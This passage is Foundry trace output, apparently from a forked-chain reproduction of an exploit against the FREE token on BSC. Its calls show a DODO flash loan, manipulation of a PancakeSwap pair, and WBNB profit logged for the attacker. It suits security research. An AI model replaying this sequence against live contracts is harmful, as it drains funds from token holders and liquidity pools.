    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xfd18ed11c38f34021f9e0be37c0771aee7da9178e3fc88759be5dcc012b10470: 0x0000000000000000000000000000000000000000000000016bb87a8a4c17eb18 → 0
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [33] FREEB::fallback{value: 22932728670147898805}()
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [672] FREE::balanceOf(FREE: [0x8A43Eb772416f934DE3DF8F9Af627359632CB53F]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 364859437509885032357 [3.648e20]
    │   │   │   │   │   ├─ [0] 0x41B68c1d275F7C11E87f59C1c7a237d1dcc45177::fallback{value: 3276104095735414115}()
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [8283] FREE::transfer(0x41B68c1d275F7C11E87f59C1c7a237d1dcc45177, 20000000000000000000 [2e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: FREE: [0x8A43Eb772416f934DE3DF8F9Af627359632CB53F], to: 0x41B68c1d275F7C11E87f59C1c7a237d1dcc45177, value: 20000000000000000000 [2e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x7ed2648421f4d3c63014aa8c265065958e4fa9c9f2ad6db5963d1e4d7b0dad1c: 0x000000000000000000000000000000000000000000000013c7711d4e9d87f7a5 → 0x000000000000000000000000000000000000000000000012b1e2d74589b7f7a5
    │   │   │   │   │   │   │   @ 0x435f659c63c9c6b5c2c1b77b50563426960e2d6235065ae603082423d7a1b09d: 0x00000000000000000000000000000000000000000000002b6ed56720b669137d → 0x00000000000000000000000000000000000000000000002c8463ad29ca39137d
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941, value: 10333045262687815614808 [1.033e22])
    │   │   │   │   │   ├─ [2439] 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2239099619375045790966 [2.239e21]
    │   │   │   │   │   ├─ emit Transfer(from: 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941, to: FREE: [0x8A43Eb772416f934DE3DF8F9Af627359632CB53F], value: 516652263134390780740 [5.166e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x13457d945bc4e7d3fddd5dfccecebab890f3766a0957ce7235be1e207c3f2f65: 0x0000000000000000000000000000000000000000000001344961c4c1865f6dfb → 0x0000000000000000000000000000000000000000000003486f33745ee385ac0f
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000023027cf3f982c284158 → 0
    │   │   │   │   │   │   @ 0xfd18ed11c38f34021f9e0be37c0771aee7da9178e3fc88759be5dcc012b10470: 0 → 0x0000000000000000000000000000000000000000000000016bb87a8a4c17eb18
    │   │   │   │   │   │   @ 0x7965d864e103467542a168632a54c313846a819b32dce33dbc1531427fd5b545: 0x0000000000000000000000000000000000000000000001800f0dbc22dbf5f037 → 0x000000000000000000000000000000000000000000000181249c022befc5f037
    │   │   │   │   │   │   @ 0x7ed2648421f4d3c63014aa8c265065958e4fa9c9f2ad6db5963d1e4d7b0dad1c: 0x000000000000000000000000000000000000000000000012b1e2d74589b7f7a5 → 0x00000000000000000000000000000000000000000000002eb3e0674058b9fae9
    │   │   │   │   │   │   @ 0x435f659c63c9c6b5c2c1b77b50563426960e2d6235065ae603082423d7a1b09d: 0x00000000000000000000000000000000000000000000002b6ed56720b669137d → 0x00000000000000000000000000000000000000000000002c8463ad29ca39137d
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [893] 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 5686884898475513703931 [5.686e21], 907601516418738790444 [9.076e20], 1704893888 [1.704e9]
    │   │   │   │   ├─ [672] FREE::balanceOf(0x24721eC014e19eA0e3c965AeE2b138cf4b72e941) [staticcall]
    │   │   │   │   │   └─ ← [Return] 15503277898028938537999 [1.55e22]
    │   │   │   │   ├─ [38396] 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941::swap(0, 574148897789587975743 [5.741e20], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   ├─ [23162] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 574148897789587975743 [5.741e20])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 574148897789587975743 [5.741e20])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xfd0767b14cedca3950384bc39e8b427ebbcc73b39cbc4b0eb9db02d1ff6a6884: 0x0000000000000000000000000000000000000000000000313380528100c9a02c → 0x0000000000000000000000000000000000000000000000121395adef7e5631ed
    │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000001f1feaa49182736e3f
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [672] FREE::balanceOf(0x24721eC014e19eA0e3c965AeE2b138cf4b72e941) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 15503277898028938537999 [1.55e22]
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x24721eC014e19eA0e3c965AeE2b138cf4b72e941) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 333452618629150814701 [3.334e20]
    │   │   │   │   │   ├─ emit Sync(reserve0: 15503277898028938537999 [1.55e22], reserve1: 333452618629150814701 [3.334e20])
    │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 9816392999553424834068 [9.816e21], amount1In: 0, amount0Out: 0, amount1Out: 574148897789587975743 [5.741e20], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x659e9dc00000000000313380528100c9a02c0000000001344961c4c1865f6dfb → 0x659e9dc00000000000121395adef7e5631ed0000000003486f33745ee385ac0f
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 574148897789587975743 [5.741e20]
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476, 500000000000000000000 [5e20])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476, value: 500000000000000000000 [5e20])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000001f1feaa49182736e3f → 0x0000000000000000000000000000000000000000000000040505cdae93236e3f
    │   │   │   │   │   @ 0x5c79f3f522b9104472f925e5aa96e2626794acdb6a7d9f181cfee783d3583c15: 0x00000000000000000000000000000000000000000000000289f1159a9ef705e6 → 0x00000000000000000000000000000000000000000000001da4d5ec7d8e4705e6
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 12: 0 → 1
    │   │   │   │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Stop]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 546833237753838634470 [5.468e20]
    │   │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 104574805318312873496545 [1.045e23]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 546833237753838634470 [5.468e20]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 104574805318312873496545 [1.045e23]
    │   │   ├─ emit DODOFlashLoan(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 500000000000000000000 [5e20], : 0)
    │   │   ├─  storage changes:
    │   │   │   @ 0x5c79f3f522b9104472f925e5aa96e2626794acdb6a7d9f181cfee783d3583c15: 0x00000000000000000000000000000000000000000000000289f1159a9ef705e6 → 0x00000000000000000000000000000000000000000000001da4d5ec7d8e4705e6
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 74148897789587975743 [7.414e19]
    ├─ emit log_named_uint(key: "Attacker WBNB balance before attack:", val: 74148897789587975743 [7.414e19])
    ├─  storage changes:
    │   @ 1: 0x0000000000000000000001010000000000000000000000000000000000000000 → 0x0000000000000000000000010000000000000000000000000000000000000000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 23.38s (21.53s CPU time)

Ran 2 test suites in 23.44s (24.27s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
